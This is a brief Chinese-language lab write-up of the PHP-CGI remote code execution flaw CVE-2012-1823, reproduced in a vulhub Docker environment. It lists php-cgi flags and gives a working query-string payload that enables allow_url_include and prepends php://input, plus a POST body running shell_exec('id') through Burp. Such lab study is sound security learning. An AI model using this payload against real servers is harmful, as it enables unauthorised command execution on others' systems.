PHP-CGI远程代码执行
漏洞利用知识:
CGI模式下的参数:
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助
环境搭建:
这里采用vulhub环境,参考文件
漏洞利用:
启动漏洞环境
进入 CVE-2012-1823
启动
sudo docker-compose up
查看正在运行的docker容器
docker ps
访问一下index.php,没问题
-s显示源码
-d执行命令
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
<?php echo shell_exec('id');?>
用burp抓包修改包(这里要请求方式要改为POST)
返回结果,上传成功。